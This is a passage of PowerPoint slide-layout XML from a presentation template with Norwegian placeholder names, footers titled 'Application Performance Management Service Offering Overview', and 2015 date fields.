            </a:lvl6pPr>
            <a:lvl7pPr marL="2742572" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199668" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365676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715719" y="1480781"/>
            <a:ext cx="3923438" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2300" b="1"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457096" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914190" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371287" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828381" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285477" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742572" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199668" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365676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lassholder for innhold 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531563" y="2112604"/>
            <a:ext cx="3923438" cy="383583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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714962" y="2112604"/>
            <a:ext cx="3923438" cy="383583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sp>
        <p:nvSpPr>
          <p:cNvPr id="10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851026" y="6438909"/>
            <a:ext cx="624554" cy="223662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{CA843FE4-C2E6-4202-9C92-A3FC33743ED6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11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49690" y="6438909"/>
            <a:ext cx="5886425" cy="222750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14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417729" y="6440278"/>
            <a:ext cx="434100" cy="223148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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178547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page 2"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/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="180000" y="180000"/>
            <a:ext cx="8784000" cy="612720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56000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="29000">
                <a:schemeClr val="bg2"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg2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Application Performance Management Service Offering Overview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6" name="Date Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436459" y="6571676"/>
            <a:ext cx="527541" cy="10772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b-NO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:fld id="{2871220F-B5B5-4FCC-9545-47730C623D3E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/26/2015</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7618183" y="4964907"/>
            <a:ext cx="1344143" cy="1343186"/>
            <a:chOff x="7618183" y="4964907"/>
            <a:chExt cx="1344143" cy="1343186"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8289184" y="5635706"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="36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26" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7618183" y="4964907"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="5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27" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7618183" y="5301497"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="8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28" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7618183" y="5635706"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="12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29" name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7618183" y="5972296"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="16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47" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8626529" y="4964907"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="16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48" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7952190" y="4964907"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="8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49" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7952190" y="5301497"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="16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0" name="Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7952190" y="5635706"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="24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1" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8289184" y="4964907"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="12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2" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8289184" y="5301497"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="24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3" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8626529" y="5301497"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="32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4" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7952190" y="5972296"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="32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5" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8626529" y="5635706"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="48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6" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8289184" y="5972296"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="48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7" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8626529" y="5972296"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="64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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29" descr="SKISSE_IC_Powerpointmal_stripped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6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851026" y="6438909"/>
            <a:ext cx="624554" cy="223662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{44AF1C02-8771-4A9E-8B44-52871D7E7243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7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49690" y="6438909"/>
            <a:ext cx="5886425" cy="222750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8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417729" y="6440278"/>
            <a:ext cx="434100" cy="223148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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2331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7851026" y="6438909"/>
            <a:ext cx="624554" cy="223662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{764C9C99-B580-4DD6-9304-E82BEA2C3378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49690" y="6438909"/>
            <a:ext cx="5886425" cy="222750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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417729" y="6440278"/>
            <a:ext cx="434100" cy="223148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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3042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" y="284"/>
            <a:ext cx="9141816" cy="685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470950"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf hd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 B">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="D7090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" y="284"/>
            <a:ext cx="9141816" cy="685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066712"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf hdr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 C">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="4140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" y="284"/>
            <a:ext cx="9141816" cy="685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518709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/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="180000" y="180000"/>
            <a:ext cx="8784000" cy="612720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56000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="29000">
                <a:schemeClr val="bg2"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg2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540080"/>
            <a:ext cx="7772400" cy="700603"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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85800" y="3240683"/>
            <a:ext cx="7772400" cy="257180"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="16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Application Performance Management Service Offering Overview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6" name="Date Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436459" y="6571676"/>
            <a:ext cx="527541" cy="10772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b-NO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:fld id="{3AA2E934-349C-4BE4-9BFF-C26F6F23D938}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/26/2015</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO" dirty="0"/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7618183" y="4964907"/>
            <a:ext cx="1344143" cy="1343186"/>
            <a:chOff x="7618183" y="4964907"/>
            <a:chExt cx="1344143" cy="1343186"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8289184" y="5635706"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="36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26" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7618183" y="4964907"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="5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27" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7618183" y="5301497"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="8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28" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7618183" y="5635706"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="12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29" name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7618183" y="5972296"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="16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47" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8626529" y="4964907"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="16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48" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7952190" y="4964907"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="8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49" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7952190" y="5301497"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="16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0" name="Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7952190" y="5635706"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="24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1" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8289184" y="4964907"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="12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2" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8289184" y="5301497"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="24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3" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8626529" y="5301497"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="32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4" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="7952190" y="5972296"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="32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5" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8626529" y="5635706"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="48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6" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8289184" y="5972296"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="48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7" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="8626529" y="5972296"/>
              <a:ext cx="335797" cy="335797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="64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540080"/>
            <a:ext cx="7772400" cy="700603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85800" y="3240683"/>
            <a:ext cx="7772400" cy="257180"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="16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Application Performance Management Service Offering Overview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Date Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436459" y="6571676"/>
            <a:ext cx="527541" cy="10772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b-NO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:fld id="{47FC9A1D-1886-4DC9-9DF9-C2C7139A5D37}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/26/2015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Application Performance Management Service Offering Overview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Date Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436459" y="6571676"/>
            <a:ext cx="527541" cy="10772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b-NO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:fld id="{037E13A9-09CF-461A-A895-D59E288EE509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10" name="Tittel 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="454518"/>
            <a:ext cx="8064000" cy="986400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="419100" indent="-419100">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip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picture/graph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Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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lassholder for innhold 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724000" y="1334125"/>
            <a:ext cx="2880000" cy="48095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Plassholder for innhold 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="1334125"/>
            <a:ext cx="5004000" cy="48095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tel 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="454518"/>
            <a:ext cx="8064000" cy="527338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="419100" indent="-419100">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436459" y="6571676"/>
            <a:ext cx="527541" cy="10772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b-NO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:fld id="{76D79B84-6CB1-43A3-8E1D-6FE0F1B0CB3F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/26/2015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r picture/graph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540000" y="5213488"/>
            <a:ext cx="8064000" cy="430090"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="179388" indent="-179388">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"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Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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tel 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="454518"/>
            <a:ext cx="8064000" cy="527338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="419100" indent="-419100">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip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Plassholder for innhold 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="1334125"/>
            <a:ext cx="8064000" cy="37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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436459" y="6571676"/>
            <a:ext cx="527541" cy="10772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b-NO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:fld id="{A584432D-57D7-4F70-9404-0FBBB5D813FB}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/26/2015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Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436459" y="6571676"/>
            <a:ext cx="527541" cy="10772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b-NO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:fld id="{44AF1C02-8771-4A9E-8B44-52871D7E7243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7" name="Tittel 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="454518"/>
